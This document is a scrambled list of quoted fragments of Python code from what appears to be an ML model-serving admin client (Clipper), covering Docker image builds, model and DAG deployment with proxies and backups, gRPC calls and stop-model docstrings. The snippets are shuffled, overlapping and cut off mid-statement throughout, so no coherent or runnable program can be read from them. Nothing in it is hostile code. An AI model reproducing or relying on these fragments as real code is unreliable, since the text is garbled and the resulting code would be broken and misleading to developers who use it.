"%s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting", "= \"\" self.lock = False ################################# self.logger = ClusterAdapter(logger, {", "\"--setmodel %s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count,", "a model name and the value is a list of", "versions of each model specified in the list will be", "import model_pb2 from .rpc import prediction_pb2_grpc from .rpc import prediction_pb2", "model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id,", "return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected:", "= str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas)", "Note ---- This method will stop the currently deployed versions", "self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image)", "= {} # for m in model_info: # if m[\"model_name\"]", "# model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None):", "# self.register_model( # name, # version, # input_type, # image=image,", "versions of models if you specify them. You almost certainly", "alphanumeric character (e.g. 'example.com', regex used for \" \"validation is", "self.cm = container_manager #############TEST################ self.runtime_dag = \"\" self.lock = False", "This method will stop the currently deployed versions of models", "proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to model')", "Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s',", "the IP address at which the query frontend can be", "specify them. You almost certainly want to use one of", "= False else: from io import BytesIO as StringIO PY3", "all model containers started via Clipper admin commands. This method", "these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops", "\"\"\"Stops all versions of the specified models. This is a", "= df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO(", "mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: #", "each entry in the dict, the key is a model", "from .rpc import management_pb2 from .rpc import management_pb2_grpc from .container_manager", "input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not", "all containers for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def", "= re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise", "container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id)", "DNS-1123 \" \" subdomain. It must consist of lower case", "from .rpc import prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc", "' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file:", "from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True, tag=image)", "proxy info to model') runtime_dag_id = name+version+str(1) ## Starting frontend", "frontend_container_id) frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend", "= True import grpc from .rpc import model_pb2_grpc from .rpc", "not affect Redis. It can also be called without calling", "url=url)) # break # except RequestException as e: # self.logger.info(\"Clipper", "image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building", "running Clipper cluster. Returns ------- str The JSON string containing", "in the Docker Mode. This parameter will take not effect", "list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for", "management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s", "used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is", "this will not affect Redis. It can also be called", "the dict, the key is a model name and the", "and all model containers. If you started Redis independently, this", "container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd = ''", "a convenience method to avoid the need to explicitly list", "key is a model name and the value is a", "stop_all(self, graceful=True): \"\"\"Stops all processes that were started via Clipper", "model version must be a valid DNS-1123 \" \" subdomain.", "performance metrics from the running Clipper cluster. Returns ------- str", "old containers you want to stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\"", "self.connected: raise UnconnectedException() # model_info = self.get_all_models() dag_description_ = dag_description", "and version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop", "20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s", "host=self.cm.get_admin_addr()) # for name, url in [('query frontend', query_frontend_url), #", "It can also be called without calling ``connect`` first. If", "< (3, 0): try: from cStringIO import StringIO except ImportError:", "Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description,", "modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s %s %s %s\"%('1',", "!= requests.codes.ok: # raise RequestException( # \"{name} end point {url}", "{}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True except", "point {url} health check failed\".format(name=name, url=url)) # break # except", "import ClipperException, UnconnectedException from .version import __version__, __registry__ from .", "must be a valid DNS-1123 \" \" subdomain. It must", "if 'stream' in b and b['stream'] != '\\n': #log build", "\"Building model Docker image with model data from {}\".format( model_data_path))", "logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def", "backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id,", "admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info for tup", "= True self.logger.info( \"Successfully connected to Clipper cluster at {}\".format(", "name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self,", "a running Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully", "expanded_dag)) self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag)) #tells the", "to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s", "%s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version, dag_description=None,", "It must consist of lower case \" \"alphanumeric characters, '-'", "# self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\"))", "Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version of", "not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) #", "re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise ClipperException(", "Used Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s", "self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\")", "import tarfile import sys from cloudpickle import CloudPickler import pickle", "serving stale versions of the specified models. For example, if", "timeout=5) # if r.status_code != requests.codes.ok: # raise RequestException( #", "import BytesIO as StringIO PY3 = True import grpc from", "inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo))", "{url} health check failed\".format(name=name, url=url)) # break # except RequestException", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) #", "import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version", "'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try:", "if not self.connected: # raise UnconnectedException() # model_info = self.get_all_models(verbose=True)", "of models if you specify them. You almost certainly want", "containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self,", "containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self):", "# model_dict = {} # for m in model_info: #", "IP address at which the query frontend can be reached", "if you specify them. You almost certainly want to use", "currently deployed versions of models if you specify them. You", "Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to", "model') runtime_dag_id = name+version+str(1) ## Starting frontend frontend_name, frontend_container_id =", "of metrics for this instance. On error, the string will", "df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo,", "in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name,", "\"2375\") def add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo", ": list(str) The names of the models whose old containers", "run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0)", "models. For example, if you have deployed versions 1, 2,", "container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get", "backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip])", "for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S',", "and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"])", "for tup in proxy_info: proxy_name = tup[0] proxy_id = tup[1]", "while True: # try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr())", "proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info for", "1 and 2 but will leave containers serving version 3", "model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\")", "# time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True except ClipperException", "the models whose old containers you want to stop. Raises", "as context_file: # Create build context tarfile with tarfile.TarFile( fileobj=context_file,", ")) self.logger.info('[DEPLOYMENT] Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\",", "= graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag =", "Parameters ---------- model_names : list(str) The names of the models", "self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id,", "UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type,", "{name}: a model name must be a valid DNS-1123 \"", "specified models. Parameters ---------- model_versions_dict : dict(str, list(str)) For each", "is not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client =", "version) run_cmd = '' if pkgs_to_install: run_as_lst = 'RUN apt-get", "the query frontend can be reached request predictions. Returns -------", "---------- model_names : list(str) The names of the models whose", "df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY", "self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name,", "+ pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create", "# self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped", "\"\"\"Fetches performance metrics from the running Clipper cluster. Returns -------", "instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if", "re import os import tarfile import sys from cloudpickle import", "deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if", "# name, # version, # input_type, # image=image, # labels=labels,", "---- This method will stop the currently deployed versions of", "model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version,", "container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\",", "name, # version, # input_type, # image=image, # labels=labels, #", "from cStringIO import StringIO except ImportError: from StringIO import StringIO", "calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\")", "def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1,", "-y install build-essential && pip install'.split( ' ') run_cmd =", "# labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version))", "stop any containers serving versions 1 and 2 but will", "= self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id,", "cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels):", "version of each model will be stopped. \"\"\" # if", "------- str The JSON string containing the current set of", "return image def deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1,", "dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = []", "RequestException( # \"{name} end point {url} health check failed\".format(name=name, url=url))", "be stopped. \"\"\" if not self.connected: raise UnconnectedException() return self.cm.get_query_addr()", "# Used Internally for Test; Not Windows Compatible logging.basicConfig( format='%(asctime)s", "= 'RUN apt-get -y install build-essential && pip install'.split( '", "batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version", ": dict(str, list(str)) For each entry in the dict, the", "replicas of all versions of each model specified in the", "try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url =", "raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info(", "for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s", "in the list will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions.", "%s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\"", "model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name, container_name, container_id,", "https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\".", "dag info for tup in proxy_info: proxy_name = tup[0] proxy_id", "= logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name,", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name,", "# for m in model_info: # if m[\"model_name\"] in model_names:", "for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict):", "running Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info( \"Successfully connected", "# if m[\"model_name\"] in model_names: # if m[\"model_name\"] in model_dict:", "def build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected: raise", "self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s", "# pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers", "{} # for m in model_info: # if m[\"model_name\"] in", "The JSON string containing the current set of metrics for", "df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit", "not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env()", "all versions of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ----------", "{data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0,", "graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup]", "pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name, version) run_cmd = '' if", "called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper", "self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4)", "self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the dag description with", "1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip, \"22222\", proxy_name,", "import __version__, __registry__ from . import graph_parser DEFAULT_LABEL = []", "self.logger.info(\"Pushing model Docker image to {}\".format(image)) for line in docker_client.images.push(repository=image,", "import re import os import tarfile import sys from cloudpickle", "of the specified models. For example, if you have deployed", "is a convenience method to avoid the need to explicitly", "UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict = {} #", "_validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model(", "break # except RequestException as e: # self.logger.info(\"Clipper still initializing:", "def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while", "# self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is", "%s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new", "if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3],", "subdomain. It must consist of lower case \" \"alphanumeric characters,", "# for name, url in [('query frontend', query_frontend_url), # ('management", "need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addruntimedag %s %s %s %s %s", "batch_size=-1): if not self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name,", "mode=\"w+b\", suffix=\"tar\") as context_file: # Create build context tarfile with", "# except RequestException as e: # self.logger.info(\"Clipper still initializing: \\n", "this instance. On error, the string will be an error", "if sys.version_info < (3, 0): try: from cStringIO import StringIO", "if not self.connected: raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names):", "frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the dag description", "end point {url} health check failed\".format(name=name, url=url)) # break #", "\\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected = True", "when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A list", "container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version,", "if deployment_regex.match(name) is None: raise ClipperException( \"Invalid value: {name}: a", "self.cm.start_clipper(mgmt_frontend_image) # while True: # try: # query_frontend_url = \"http://{host}/metrics\".format(", "name, version, input_type, image, labels=None, num_replicas=1, batch_size=-1): if not self.connected:", "nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name, model_version,", "Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self):", "and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers", "= self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container", "container_registry is not None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client", "self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host))", "Clipper cluster. Returns ------- str The JSON string containing the", "Finished setting proxy info to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\",", "it's in the Docker Mode. This parameter will take not", "and end with \" \"an alphanumeric character (e.g. 'example.com', regex", "for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None:", "value: {name}: a model name must be a valid DNS-1123", "dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException() # model_info =", "= ' '.join(run_as_lst + pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as", "A list of model names. All replicas of all versions", "management frontend Docker containers and all model containers. If you", "import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import", "install build-essential && pip install'.split( ' ') run_cmd = '", "[%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str", "'.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics from the running", "'example.com', regex used for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str))", "\"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and all model", "if it's in the Docker Mode. This parameter will take", "frontend_info) self.runtime_dag = expanded_dag # TODO: need to modularize self.cm.grpc_client(\"zsxhku/grpcclient\",", "case \" \"alphanumeric characters, '-' or '.', and must start", "# model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4)", "%s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for", "proxy_name = tup[0] proxy_id = tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\",", ":py:exc:`clipper.UnconnectedException` versions. All replicas for each version of each model", "model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] #", "input_type, # image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model", "os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile", "Returns ------- str The address as an IP address or", "will be stopped. Note ---- This method will stop the", "tup[0] proxy_id = tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s", "all model containers. If you started Redis independently, this will", "Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP", "to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s", "# level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex =", "count = 1 for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info)", "model name and the value is a list of model", "self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to admin daemon\\n%s\"%(expanded_dag))", "with model data from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build(", "dict, the key is a model name and the value", "even if the Clipper management frontend or Redis has crashed.", "graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime)", "self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name,", "initializing: \\n {}\".format(e)) # time.sleep(1) self.logger.info(\"Clipper is running\") self.connected =", "in b and b['stream'] != '\\n': #log build steps only", "model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\",", "import StringIO PY3 = False else: from io import BytesIO", "#time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(proxy_ip,", "must start and end with \" \"an alphanumeric character (e.g.", "= self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the ip of", "containers you want to stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" #", "---------- model_versions_dict : dict(str, list(str)) For each entry in the", "reached request predictions. Returns ------- str The address as an", "frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5) # if r.status_code", "\"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info =", "requests.codes.ok: # raise RequestException( # \"{name} end point {url} health", "for each version of each model will be stopped. \"\"\"", "raise UnconnectedException() # model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description:", "logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO)", ".rpc import model_pb2 from .rpc import prediction_pb2_grpc from .rpc import", "import absolute_import, division, print_function import logging import docker import tempfile", "%s %s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished", "containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes that were started", "from StringIO import StringIO PY3 = False else: from io", "for m in model_info: # if m[\"model_name\"] in model_names and", "regex used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version)", "logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version):", "crashed. It can also be called without calling ``connect`` first.", "description with the model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_, name,", "container_manager): self.connected = False self.cm = container_manager #############TEST################ self.runtime_dag =", "not self.connected: raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops", "True self.logger.info( \"Successfully connected to Clipper cluster at {}\".format( self.cm.get_query_addr()))", "self.runtime_dag = \"\" self.lock = False ################################# self.logger = ClusterAdapter(logger,", "stopped. \"\"\" if not self.connected: raise UnconnectedException() return self.cm.get_query_addr() def", "version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels,", "num_replicas=num_replicas) # self.register_model( # name, # version, # input_type, #", "deployed versions 1, 2, and 3 of model \"music_recommender\" and", "example, if you have deployed versions 1, 2, and 3", "2, and 3 of model \"music_recommender\" and version 3 is", "docker.from_env() self.logger.info( \"Building model Docker image with model data from", "get the ip of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id)", "host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name,", "If graceful=False, Clipper will issue Docker Kill if it's in", "# \"{name} end point {url} health check failed\".format(name=name, url=url)) #", "the key is a model name and the value is", "connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version, image,", "self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the ip of the", "%s:%s (HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name,", "# raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) #", "# input_type, # image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying", "0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel", "used to clean up leftover Clipper model containers even if", "input_type, image, labels, num_replicas, batch_size) def build_model(self, name, version, model_data_path,", "build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path)", "name, version, input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None):", "%s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = []", "%(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str =", "the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers serving versions", "manager to finish the tar file # Seek back to", "version): if deployment_regex.match(name) is None: raise ClipperException( \"Invalid value: {name}:", "specified models. This is a convenience method to avoid the", "__init__(self, container_manager): self.connected = False self.cm = container_manager #############TEST################ self.runtime_dag", "started via Clipper admin commands. This includes the query and", "\"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy') count", "instance. On error, the string will be an error 